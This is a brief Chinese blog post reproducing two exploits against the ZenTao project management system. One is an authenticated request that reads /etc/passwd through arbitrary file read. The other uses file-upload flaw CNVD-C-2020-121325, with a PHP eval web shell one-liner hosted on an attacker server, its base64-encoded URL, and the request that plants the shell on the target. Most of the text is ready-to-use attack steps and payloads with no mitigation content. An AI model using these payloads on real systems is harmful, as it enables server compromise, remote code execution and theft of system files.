禅道

1.漏洞复现

后台任意文件读取

影响范围:禅道开源版 <= 11.6

登录后台,GET请求任意文件读取/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd

CNVD-C-2020-121325 文件上传漏洞

影响范围:10.x < 禅道开源版 < 12.4.3

木马脚本放自己网站

<?php echo '<?php @eval($_POST[1]);?>';

HTTP://192.168.165.79/shell.php,HTTP大写、base64编码:SFRUUDovLzE5Mi4xNjguMTY1Ljc5L3NoZWxsLnBocA==

登录后台,GET请求,/zentao/client-download-1-SFRUUDovLzE5Mi4xNjguMTY1Ljc5L3NoZWxsLnBocA==.html

PHP一句话木马路径:/zentao/data/client/1/shell.php

posted @ 2023-01-17 16:22  Hacker&Cat  阅读(30)  评论(0编辑  收藏  举报